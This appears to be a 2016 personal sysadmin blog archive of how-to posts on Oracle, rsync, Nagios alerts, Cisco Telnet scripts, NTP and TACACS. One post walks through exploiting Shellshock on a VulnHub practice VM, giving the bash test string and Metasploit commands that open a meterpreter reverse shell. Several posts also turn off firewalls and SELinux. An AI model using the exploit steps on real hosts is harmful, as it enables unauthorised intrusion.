Vannakk.net: 2016

Monday, December 26, 2016

Install Oracle Database 12c on Oracle Linux 7

OS: Oracle Linux 7 - 64bits
Database: Oracle Database 12c

Let start install vim editor:

yum install vim -y

vim /etc/hosts
123.123.123.111 oraclesvr.localdomain oraclesvr

vim /etc/sysctl.conf

fs.file-max = 6815744
kernel.sem = 250 32000 100 128
kernel.shmmni = 4096
kernel.shmall = 1073741824
kernel.shmmax = 4398046511104
kernel.panic_on_oops = 1
net.core.rmem_default = 262144
net.core.rmem_max = 4194304
net.core.wmem_default = 262144
net.core.wmem_max = 1048576
net.ipv4.conf.all.rp_filter = 2
net.ipv4.conf.default.rp_filter = 2
fs.aio-max-nr = 1048576
net.ipv4.ip_local_port_range = 9000 65500

/sbin/sysctl -p

vim /etc/security/limits.conf
oracle soft nofile 1024
oracle hard nofile 65536
oracle soft nproc 16384
oracle hard nproc 16384
oracle soft stack 10240
oracle hard stack 32768
oracle hard memlock 134217728
oracle soft memlock 134217728

yum install binutils -y
yum install compat-libstdc++-33 -y
yum install compat-libstdc++-33.i686 -y
yum install gcc -y
yum install gcc-c++ -y
yum install glibc -y
yum install glibc.i686 -y
yum install glibc-devel -y
yum install glibc-devel.i686 -y
yum install ksh -y
yum install libgcc -y
yum install libgcc.i686 -y
yum install libstdc++ -y
yum install libstdc++.i686 -y
yum install libstdc++-devel -y
yum install libstdc++-devel.i686 -y
yum install libaio -y
yum install libaio.i686 -y
yum install libaio-devel -y
yum install libaio-devel.i686 -y
yum install libXext -y
yum install libXext.i686 -y
yum install libXtst -y
yum install libXtst.i686 -y
yum install libX11 -y
yum install libX11.i686 -y
yum install libXau -y
yum install libXau.i686 -y
yum install libxcb -y
yum install libxcb.i686 -y
yum install libXi -y
yum install libXi.i686 -y
yum install make -y
yum install sysstat -y
yum install unixODBC -y
yum install unixODBC-devel -y
yum install zlib-devel -y
yum install zlib-devel.i686 -y

groupadd -g 54321 oinstall
groupadd -g 54322 dba
groupadd -g 54323 oper
useradd -u 54321 -g oinstall -G dba,oper oracle

passwd oracle
*********

vim /etc/selinux/config
SELINUX=permissive

setenforce Permissive

systemctl stop firewalld
systemctl disable firewalld

mkdir -p /u01/app/oracle/product/12.1.0.2/db_1
mkdir /u01/setup
chown -R oracle:oinstall /u01
chmod -R 775 /u01

Copy database files to server: /u01/setup

Install VNC Server for user Oracle
yum groupinstall "X Window System" -y

yum install gnome-classic-session gnome-terminal nautilus-open-terminal control-center liberation-mono-fonts -y

unlink /etc/systemd/system/default.target
ln -sf /lib/systemd/system/graphical.target /etc/systemd/system/default.target

reboot

yum install tigervnc-server -y

cp /lib/systemd/system/vncserver@.service /etc/systemd/system/vncserver@:3.service

vim /etc/systemd/system/vncserver\@\:3.service
Edit as these lines:
ExecStart=/sbin/runuser -l oracle -c "/usr/bin/vncserver %i -geometry 640x480"
PIDFile=/home/oracle/.vnc/%H%i.pid

I am create for user oracle in this case,
Login as user oracle and issue the following command:
su - oracle
vncpasswd
Password: *********
Verify: *********

exit

Reload systemd for changes.
systemctl daemon-reload

Enable service at startup
systemctl enable vncserver@:3.service

Start the service .
systemctl start vncserver@:3.service

Start the VNC viewer and connect to server with user Oracle,
Start a terminal and issue the following command to install Oracle
cd /u01/setup
extract database files:
unzip linuxamd64_12102_database_se2_1of2.zip
unzip linuxamd64_12102_database_se2_2of2.zip

After Extract there is be have a folder name : database
go to that folder:
cd /u01/setup/database

And run the script install:
./runInstaller

Let login: https://123.123.123.111:5500/em

Done,

Friday, November 25, 2016

RSYNC With Username and Password

On Server2:

In this example we have user2 and password: PaSSWDUser2

yum install rsync

mkdir /home/user2/dir-server2

vi /home/user2/.rsyncd.secrets

user2:PaSSWDUser2

chmod 600 /home/user2/.rsyncd.secrets

vim /etc/rsyncd.conf

With content:

use chroot = false
lock file = /var/log/rsync.lock
log file = /var/log/rsyncd.log
pid file = /var/log/rsyncd.pid
[dir-server2]
        path=/home/user2/dir-server2/
        comment = Directory on Server2
        uid = root
        gid = root
        read only = no
        list = yes
        auth users = user2
        secrets file = /home/user2/.rsyncd.secrets
        max connections = 10

hosts allow = 123.123.123.101

service iptables stop

rsync --daemon

On Server1:

In this example, we have user1 on server1 with password: PaSSWDUser1

Create a file name and store only the password of user2

vi /home/user1/.rsync.secrets

With content:

PaSSWDUser2

chmod 600 /home/user1/.rsync.secrets

chown user1:user1 /home/user1/.rsync.secrets

rsync -avz --password-file=/home/user1/.rsync.secrets /home/user1/dir-server1/ user2@123.123.123.102::dir-server2

Wednesday, November 23, 2016

Install NAGIOS With send Email and SMS Alert

OS: Ubuntu Server 14.04
IP Address: 123.123.123.55

vim /etc/network/interfaces
With content:
auto eth0
iface eth0 inet static
address 123.123.123.55
netmask 255.255.255.0
gateway 123.123.123.2
dns-nameservers 123.123.123.2

Log in as root and install

1. Install Required Packages:
apt-get install wget apache2 apache2-utils php5 libapache2-mod-php5 build-essential libgd2-xpm-dev -y

Resstart Service Apache2
service apache2 start

2. Setup User Account for Nagios
useradd nagios
groupadd nagcmd
usermod -a -G nagcmd nagios
usermod -a -G nagcmd www-data

3. Installing Nagios Core Service
cd /opt/
wget http://prdownloads.sourceforge.net/sourceforge/nagios/nagios-4.0.8.tar.gz
tar xvzf nagios-4.0.8.tar.gz
cd nagios-4.0.8
./configure --with-command-group=nagcmd
make all
make install
make install-init
make install-config
make install-commandmode

Now create nagios apache2 configuration file.
vim /etc/apache2/sites-available/nagios.conf

ScriptAlias /nagios/cgi-bin "/usr/local/nagios/sbin"

Options ExecCGI
AllowOverride None
Order allow,deny
Allow from all
AuthName "Restricted Area"
AuthType Basic
AuthUserFile /usr/local/nagios/etc/htpasswd.users
Require valid-user

Alias /nagios "/usr/local/nagios/share"

Options None
AllowOverride None
Order allow,deny
Allow from all
AuthName "Restricted Area"
AuthType Basic
AuthUserFile /usr/local/nagios/etc/htpasswd.users
Require valid-user

Enable Site:
a2ensite nagios

4. Configuring Apache Authentication
htpasswd -c /usr/local/nagios/etc/htpasswd.users nagiosadmin

Enable Module cgi
a2enmod cgi

Resstart Service Apache2
service apache2 restart

5. Installing Nagios Plugins

cd /opt
wget http://nagios-plugins.org/download/nagios-plugins-2.0.3.tar.gz
tar xvzf nagios-plugins-2.0.3.tar.gz
cd nagios-plugins-2.0.3
./configure --with-nagios-user=nagios --with-nagios-group=nagios
make
make install

Verify Configuration and Start Nagios
/usr/local/nagios/bin/nagios -v /usr/local/nagios/etc/nagios.cfg

service nagios start

Configure Nagios to auto start on system boot.

ln -s /etc/init.d/nagios /etc/rcS.d/S99nagios

Access Nagios Web Interface

http://123.123.123.55/nagios/

nagiosadmin

6. Configure Nagios
cp /usr/local/nagios/etc/nagios.cfg /usr/local/nagios/etc/nagios.cfg.orig

vim /usr/local/nagios/etc/nagios.cfg
Add this line

cfg_file=/usr/local/nagios/etc/objects/commands.cfg
cfg_file=/usr/local/nagios/etc/objects/contacts.cfg
cfg_file=/usr/local/nagios/etc/objects/contactgroup.cfg
cfg_file=/usr/local/nagios/etc/objects/hostgroup.cfg
cfg_file=/usr/local/nagios/etc/objects/timeperiods.cfg
cfg_file=/usr/local/nagios/etc/objects/templates.cfg

cfg_dir=/usr/local/nagios/etc/servers
cfg_dir=/usr/local/nagios/etc/switches
cfg_dir=/usr/local/nagios/etc/routers

cd /usr/local/nagios/etc
mkdir servers switches routers

6. Configure send email and sms alert

6.1. vim /usr/local/nagios/etc/objects/templates.cfg
define host{
name host-check-template
check_command check-host-alive
check_period 24x7
max_check_attempts 5
notification_interval 60
notification_period 24x7
notification_options d,r
contact_groups hosts-template
register 0
}

define service{
name service-check-template
is_volatile 0
check_period 24x7
max_check_attempts 5
normal_check_interval 5
retry_check_interval 5
notification_interval 60
notification_period 24x7
notification_options w,u,c,r
contact_groups hosts-template
register 0
}

6.2. vim /usr/local/nagios/etc/objects/contactgroup.cfg
define contactgroup{
contactgroup_name hosts-template
alias Hosts Template
}

6.3. vim /usr/local/nagios/etc/objects/hostgroup.cfg
define hostgroup{
hostgroup_name Hosts-Template
alias Host Template
}

6.4. vim /usr/local/nagios/etc/routers/router-gateway.cfg
define host{
use host-check-template
host_name router-gateway
alias Router Gateway
address 123.123.123.101
hostgroups Hosts-Template
}

define service{
use service-check-template
host_name router-gateway
service_description PING Router Gateway
check_command check_ping!100.0,20%!500.0,60%
}

6.5. vim /usr/local/nagios/etc/objects/commands.cfg

# 'notify-host-by-sms' command definition
define command{
command_name notify-host-by-sms
command_line /usr/local/nagios/libexec/send_sms.sh $CONTACTPAGER$ "Host: $HOSTNAME$ $HOSTSTATE$ Address: $HOSTADDRESS$ Date $LONGDATETIME$"

}
# 'notify-service-by-sms' command definition
define command{
command_name notify-service-by-sms
command_line /usr/local/nagios/libexec/send_sms.sh $CONTACTPAGER$ "Service: $SERVICEDESC$ $HOSTALIAS$ $HOSTADDRESS$ $SERVICESTATE$ $LONGDATETIME$"

}

# 'notify-host-by-email' command definition
define command{
command_name notify-host-by-email
command_line /usr/bin/printf "%b" "***** Nagios *****\n\nNotification Type: $NOTIFICATIONTYPE$\nHost: $HOSTNAME$\nState: $HOSTSTATE$\nAddress: $HOSTADDRESS$\nInfo: $HOSTOUTPUT$\n\nDate/Time: $LONGDATETIME$\n" | /usr/bin/mail -s "** $NOTIFICATIONTYPE$ Host Alert: $HOSTNAME$ is $HOSTSTATE$ **" $CONTACTEMAIL$
}

# 'notify-service-by-email' command definition
define command{
command_name notify-service-by-email
command_line /usr/bin/printf "%b" "***** Nagios *****\n\nNotification Type: $NOTIFICATIONTYPE$\n\nService: $SERVICEDESC$\nHost: $HOSTALIAS$\nAddress: $HOSTADDRESS$\nState: $SERVICESTATE$\n\nDate/Time: $LONGDATETIME$\n\nAdditional Info:\n\n$SERVICEOUTPUT$\n" | /usr/bin/mail -s "** $NOTIFICATIONTYPE$ Service Alert: $HOSTALIAS$/$SERVICEDESC$ is $SERVICESTATE$ **" $CONTACTEMAIL$
}

6.6 vim /usr/local/nagios/libexec/send_sms.sh
Create a free 10 SMS or buy it from: http://www.msg2send.com
and use the following script with its API

#!/bin/bash
DEST=$1
MSG=$2
log=/var/log/sms.log
EMAIL_TO=kenvannak@yahoo.com
#Generate unique ID for each SMS
tagid=`echo $(($(date +%s%N)/1000000))`

function sendmail
{
message="$1"
echo "CHECK SERVER NAGIOS!!. $message" | mail -s "PROVIDER SMS FAIL" $EMAIL_TO
}
echo "" >> $log
echo "###################################################" >> $log
echo $(date +"%T-%m-%d-%Y") >> $log
echo "Messag to send: $MSG" >> $log
NUMBER_CARAT=`echo $MSG | wc -c`
echo "Number caracteres: $NUMBER_CARAT" >> $log

if [ $NUMBER_CARAT -gt 153 ];
then
NEW_MSG=${MSG:0:138}
MSG="SMS SHORTED! $NEW_MSG"
echo "New Mesagge: $MSG" >> $log
NUMBER_CARAT=`echo $MSG | wc -c`
echo "Number caracteresi new mesagge: $NUMBER_CARAT" >> $log
fi
echo "" >> $log
RESULT=`curl --data "id=sms-user&pw=SMSPASSWORD&dnr=%2B$DEST&senderid=%2B85515545966&msg= $MSG&tagid=$tagid" http://api.msg2send.com/api`
echo "Resutl for curl command: $RESULT" >> $log
echo "This SMS has the TAGID: $tagid" >> $log
#Before to check the status code we sleep some seconds
sleep 17
STATUS=`curl --data "id=sms-user&pw=SMSPASSWORD&dnr=%2B$DEST&tagid=$tagid" http://api.msg2send.com/apim`
echo "Resutl for SMS Delivery: $STATUS" >> $log

Make the Script Executable
chmod +x /usr/local/nagios/libexec/send_sms.sh

touch /var/log/sms.log
chown nagios:nagios /var/log/sms.log

6.7. vim /usr/local/nagios/etc/objects/contacts.cfg
define contact {
contact_name vannakk-sms
alias vannakk SMS
contactgroups hosts-template
service_notification_period 24x7
host_notification_period 24x7
service_notification_options w,c,r
host_notification_options d,r
service_notification_commands notify-service-by-sms
host_notification_commands notify-host-by-sms
pager 85515545966
}

define contact {
contact_name vannakk-email
alias vannakk EMAIL
contactgroups hosts-template
service_notification_period 24x7
host_notification_period 24x7
service_notification_options w,c,r
host_notification_options d,r
service_notification_commands notify-service-by-email
host_notification_commands notify-host-by-email
email ken.vannakk@gmail.com
}

Install Mail Command
apt-get install postfix heirloom-mailx

VERIFY CONFIG
/usr/local/nagios/bin/nagios -v /usr/local/nagios/etc/nagios.cfg

RESTART NAGIOS
/etc/init.d/nagios restart

CHECK NAGIOS LOG
tailf /usr/local/nagios/var/nagios.log

CHECK MAIL LOG
tailf /var/log/mail.log

CHECK SMS LOG
tailf /var/log/sms.log

After Add host:

Test Send Mail Alert

Test SMS Alert

Wednesday, November 16, 2016

Ping Script in Windows

@ECHO OFF
set IPADDRESS=8.8.8.8
set INTERVAL=5
:PINGINTERVAL

ping %IPADDRESS% -n 1
if errorlevel 1 echo %date% %time% >> c:\Users\vannak.ken\Desktop\failurelog.txt

timeout %INTERVAL%
GOTO PINGINTERVAL

Thursday, November 10, 2016

Telnet Switch And Shutdown Port - Python

In this Example is going to shutdown and no shutdown on port: FastEthernet0/1

SHUTDOWN

#!/usr/bin/python

import getpass

import sys

import telnetlib

HOST = "123.123.123.155"

user = raw_input("Enter your remote account: ")

password = getpass.getpass()

telnet = telnetlib.Telnet(HOST)

telnet.read_until("username: ",3)

telnet.write(user + "\n")

if password:

telnet.read_until("password:",3)

telnet.write(password + "\n")

telnet.write("show ip int br\n")

telnet.write("configure terminal\n")

telnet.write("interface FastEthernet0/1\n")

telnet.write("shutdown\n")

telnet.write("end\n")

telnet.write("wr\n")

telnet.write("exit\n")

print "###### ALL COMMAND RUNNING #####"

print telnet.read_all()

NO SHUTDOWN

#!/usr/bin/python

import getpass

import sys

import telnetlib

HOST = "123.123.123.155"

user = raw_input("Enter your remote account: ")

password = getpass.getpass()

telnet = telnetlib.Telnet(HOST)

telnet.read_until("username: ",3)

telnet.write(user + "\n")

if password:

telnet.read_until("password:",3)

telnet.write(password + "\n")

telnet.write("show ip int br\n")

telnet.write("configure terminal\n")

telnet.write("interface FastEthernet0/1\n")

telnet.write("no shutdown\n")

telnet.write("end\n")

telnet.write("wr\n")

telnet.write("exit\n")

print "###### ALL COMMAND RUNNING #####"

print telnet.read_all()

Wednesday, November 9, 2016

Loop In Turtle

# SQUARE
python2.7
import turtle
t = turtle.Pen()
for i in range(0,4):
t.forward(50)
t.left(90)

# 8 SQUARE
python2.7
import turtle
t = turtle.Pen()
for i in range(0,8):
t.forward(50)
t.left(45)

# STAR
python2.7
import turtle
t = turtle.Pen()
for i in range(0,5):
t.forward(100)
t.right(144)

# S.TH
python2.7
import turtle
t = turtle.Pen()
for i in range(1,76):
t.forward(222)
t.left(175)

# S.TH
python2.7
import turtle
t = turtle.Pen()
for i in range(1,144):
t.forward(333)
t.left(175)

# S.TH
python2.7
import turtle
t = turtle.Pen()
for i in range(0,30):
t.forward(333)
t.right(156)

Saturday, November 5, 2016

Guessing Number Python Game

#!/usr/bin/python
import random
computerGuess=random.randint(0,100)
while True:
userGuess=int(input("Guess a number between 0 - 100: "))
if userGuess > computerGuess:
print ("Guess Lower")
elif userGuess < computerGuess:
print ("Guess Higher")
else:
print ("Congrate, You are correct.")
break

Thursday, November 3, 2016

Shell Script grep The Same Word In 2 Files

cat test1.txt
test001
test002
test003
test004
test005

cat test2.txt
test003
test004
test005
test006

./grep-word-2-files.sh
test003
test004
test005

cat grep-word-2-files.sh
#!/bin/bash
rm -rf /home/vannak/diff/match-word.txt
for i in `cat /home/vannak/diff/test1.txt`
do
grep $i /home/vannak/diff/test2.txt >> /home/vannak/diff/match-word.txt
done
cat /home/vannak/diff/match-word.txt

Monday, October 17, 2016

ShellShock

Kali IP: 123.123.123.51
Victim IP: 123.123.123.52

Download The ShellShock VM from here:
https://download.vulnhub.com/pentesterlab/cve-2014-6271.iso

Install the VM from the download ISO,
Login

check shellsock by command:

check if the server is vulnerable with ShellShock by:

On the Victim PC
bash --version
env x='() { :;}; echo vulnerable' bash -c 'echo just a test shellshock'

On Kali
Open a Broswer:

http://123.123.123.52/cgi-bin/status

msfconsole

use exploit/multi/http/apache_mod_cgi_bash_env_exec
set LHOST 123.123.123.51
set RHOST 123.123.123.52
set TARGETURI /cgi-bin/status
set payload linux/x86/meterpreter/reverse_tcp

exploit

Get in Success...!

Wednesday, October 12, 2016

Install NTP Server And Client On CentOS 7

NTP Server01 IP: 123.123.123.150
NTP Client IP: 123.123.123.151

1. Install NTP Server on CentOS 7
yum -y install ntp

vi /etc/ntp.conf
server 0.kh.pool.ntp.org
server 0.asia.pool.ntp.org
server 2.asia.pool.ntp.org
logfile /var/log/ntp.log

firewall-cmd --add-service=ntp --permanent
firewall-cmd --reload

After you have opened Firewall port 123,
Start NTP server and make sure you enable it system-wide.
Use the following commands to manage the service.
systemctl restart ntpd
systemctl enable ntpd
systemctl status ntpd

After NTP daemon has been started,
wait a few minutes for the server to synchronize time with its pool list servers,
then run the following commands to verify NTP peers synchronization status and your system time.
ntpq -p
date -R

ntpdate -q 0.kh.pool.ntp.org 0.asia.pool.ntp.org

2. Configure NTP Client on CentOS 7
vim /etc/hosts
123.123.123.150 ntpsvr01 ntpsvr01.vnkk.net

yum -y install ntp

vim /etc/ntp.conf
server ntpsvr01.vnkk.net
server ntpsvr02.vnkk.net
logfile /var/log/ntp.log

systemctl restart ntpd
systemctl enable ntpd
systemctl status ntpd

ntpdate –u ntpsvr01.vnkk.net
ntpdc -c sysinfo

Tuesday, October 11, 2016

Tacacs With CISCO Device Authentication

1. Tacacs With CISCO Device Authentication
1.1. Static IP
1.2 Install Tacac On Ubuntu Server 14.04
1.3 Generate a password for Enable
1.4 Configire Tacacs
1.5 Create users in Linux System And Set Password For Users

2. Configure On Router (c3600)
2.1 Set IP Address And Add Tacacs Server
2.2 Test Login

Tacac Server IP: 123.123.123.55
Router IP: 123.123.123.56

123.123.123.55 123.123.123.56
tacacs-svr (eth0)---------------------------------------------------(interface fa0/0) Router1

1. Tacacs With CISCO Device Authentication
1.1. Static IP

vi /etc/network/interfaces
auto eth0
iface eth0 inet static
address 123.123.123.55
netmask 255.255.255.0
gateway 123.123.123.2
dns-nameservers 123.123.123.2
dns-nameservers 8.8.8.8

vi /etc/hostname
tacacs-svr

vi /etc/hosts
127.0.1.1 tacacs-svr
123.123.123.55 tacacs-svr

vi /etc/resolv.conf
nameserver 123.123.123.2
search localdomain

1.2 Install Tacac On Ubuntu Server 14.04
Installations
apt-get install tacacs+

1.3 Generate a password for Enable

root@tacacs-svr:~# tac_pwd
Password to be encrypted: vannak123
ir0SF/mM8ddFI
root@tacacs-svr:~#

1.4 Configire Tacacs
cp /etc/tacacs+/tac_plus.conf /etc/tacacs+/tac_plus.conf.original
touch /var/log/tac_plus.acct

vim /etc/tacacs+/tac_plus.conf
With content:
#################### CONFIG #######################
key = tacacs123
accounting syslog;
accounting file = /var/log/tac_plus.acct
###################### ACL ########################
acl = network_admin {
# allow access from all sources
permit = .*
}
acl = support-team {
# allow access to 123.123.123.56 only
permit = 123\.123\.123\.56$
}
#################### GROUP ########################
group = network_admin {
default service = permit
acl = network_admin
service = exec {
priv-lvl = 15
}
}
group = support-team {
default service = deny
acl = router-hq
service = exec {
priv-lvl = 0
}
cmd = enable {
permit .*
}
cmd = show {
permit .*
}
cmd = exit {
permit .*
}
}
#################### USER ########################
user = tacacadmin {
login = file /etc/passwd
member = network_admin
}
user = tacacuser1 {
login = file /etc/passwd
member = support-team
}
#################### ENABLE ########################
user = $enab15$ {
login = des ir0SF/mM8ddFI
}

1.5 Create users in Linux System And Set Password For Users
useradd -m tacacadmin
passwd tacacadmin

useradd -m tacacuser1
passwd tacacuser1

2. Configure On Router (c3600)
2.1 Set IP Address And Add Tacacs Server
Router>en
Router#configure terminal
Enter configuration commands, one per line. End with CNTL/Z.
Router(config)#hostname R1
R1(config)#interface fastEthernet 0/0
R1(config-if)#ip address 123.123.123.56 255.255.255.0
R1(config-if)#no shutdown
R1(config-if)#end
R1#configure terminal
Enter configuration commands, one per line. End with CNTL/Z.
R1(config)#aaa new-model
R1(config)#aaa authentication login default group tacacs+ enable
R1(config)#aaa authentication enable default group tacacs+ enable
R1(config)#aaa authentication commands 15 default group tacacs+ if-authenticated
R1(config)#tacacs-server host 123.123.123.55
R1(config)#tacacs-server key tacacs123
R1(config)#end
R1#configure terminal
Enter configuration commands, one per line. End with CNTL/Z.
R1(config)#enable secret vannakenable
R1(config)#end
R1#configure terminal
Enter configuration commands, one per line. End with CNTL/Z.
R1(config)#line console 0
R1(config-line)#password vannak0
R1(config-line)#end
R1#configure terminal
Enter configuration commands, one per line. End with CNTL/Z.
R1(config)#line vty 0 15
R1(config-line)#password vannak015
R1(config-line)#end
R1#write
Building configuration...
[OK]
R1#

2.2 Test Login

Login with tacacadmin